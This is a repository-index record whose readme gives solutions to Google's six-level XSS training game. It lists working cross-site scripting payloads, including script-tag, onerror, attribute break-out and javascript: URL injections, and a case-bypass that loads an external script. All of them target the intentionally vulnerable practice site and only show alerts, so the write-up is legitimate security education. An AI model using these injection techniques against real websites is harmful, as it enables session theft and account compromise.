{"id":21983036,"url":"https://github.com/arsho/xss_game","last_synced_at":"2025-03-23T01:30:11.635Z","repository":{"id":79174298,"uuid":"83117067","full_name":"arsho/xss_game","owner":"arsho","description":"Solution of XSS game by Google.","archived":false,"fork":false,"pushed_at":"2018-08-01T03:50:10.000Z","size":37,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-01-28T04:46:11.107Z","etag":null,"topics":["xss","xss-vulnerability"],"latest_commit_sha":null,"homepage":"https://xss-game.appspot.com/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/arsho.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-02-25T08:12:11.000Z","updated_at":"2022-11-13T23:29:05.000Z","dependencies_parsed_at":"2023-05-18T17:30:37.716Z","dependency_job_id":null,"html_url":"https://github.com/arsho/xss_game","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/arsho","download_url":"https://codeload.github.com/arsho/xss_game/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245043724,"owners_count":20551833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["xss","xss-vulnerability"],"created_at":"2024-11-29T17:34:14.340Z","updated_at":"2025-03-23T01:30:11.614Z","avatar_url":"https://github.com/arsho.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS-game by Google\n\nGoogle has created 6 level interactive XSS game. \n[Click here to start playing](https://xss-game.appspot.com/ \"XSS game area\")\n\nIf you can pass all the challenges, you will be rewarded with an appealing cake! \u003cimg class=\"emoji\" title=\":smiley:\" alt=\":smiley:\" src=\"https://assets-cdn.github.com/images/icons/emoji/unicode/1f603.png\" height=\"20\" width=\"20\" align=\"absmiddle\"\u003e\n\n## Level 1: Hello, world of XSS\nIn this level you will learn what happens to the application if you use input from user directly without proper escaping.\n\n### Solution\n\n```html\n\u003cscript\u003ealert(\"Level1\");\u003c/script\u003e\n```\n\n\n## Level 2: Persistence is key\nSimilar to level 1. But this time directly inserting `\u003cscript\u003e` tag will not work.\n\n### Solution\n\n```html\n\u003cimg src=\"demo\" onerror='javascript:alert(\"Level2\");' /\u003e\n```\n\n\n## Level 3: That sinking Feeling\nThere is no input field in thie level. But still Cross Site Scripting is possible via the address path as the JavaScript code directly uses `self.location.hash.substr(1)`. It is the url part after the `#` sign.\n\n### Solution\n\nSimply inject the following: \n\n```javascript\nhttps://xss-game.appspot.com/level3/frame#'onerror='alert(\"Level3\")'\n```\n\n\n## Level 4: Context matters\nThe code passes user value directly to `onload=\"startTimer('{{ timer }}');\"` method. Thus we can exploit the script. \n\n### Solution\n\nAdd the following part in the input field.\n\n```\n');javascript:alert('Level4\n```\n\n\n## Level 5: Breaking protocol\nThis is the most tricky challenge. Here some templates are connected in chain by storing the `next` URL in a variable. So, if we can somehow change the value of `next` variable then XSS will work.\n\n### Solution\n\nSo we simply change the URL to:\n \n```\nhttps://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('Level5')\n\nPress GO which will change the URL of Next button to javascript:alert('Level5').\n\nFinally press the Next button.\n```\n\n\n## Level 6: Follow the rabbit\nDo you know `regular expression`? If the answer is `yes` what do you think the following code snipper will do?\n\n```javascript\nurl.match(/^https?:\\/\\//)\n```\nYeah! You are right. It will return true if `url` variable starts with `http. What happen if `url` starts with `HTTP`?\n\nIf you do not know `regex`, start learning from \n[Learn Regular Expressions with simple, interactive exercises](https://regexone.com/ \"RegexOne,\nLearn Regular Expressions with simple, interactive exercises.\")\n\n### Solution\n\n```html\nhttps://xss-game.appspot.com/level6/frame#HTTPS://arsho.github.io/rough/alert.js\n```\n\n\n## Congratulation! Let's eat the cake!!\n\n![alt xss_cake](https://raw.githubusercontent.com/arsho/xss_game/master/screenshot/xss_game_cake.png)\n\n\u003chr\u003e\n\nAuthor: [Ahmedur Rahman Shovon](https://arsho.github.io)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Farsho%2Fxss_game","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Farsho%2Fxss_game","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Farsho%2Fxss_game/lists"}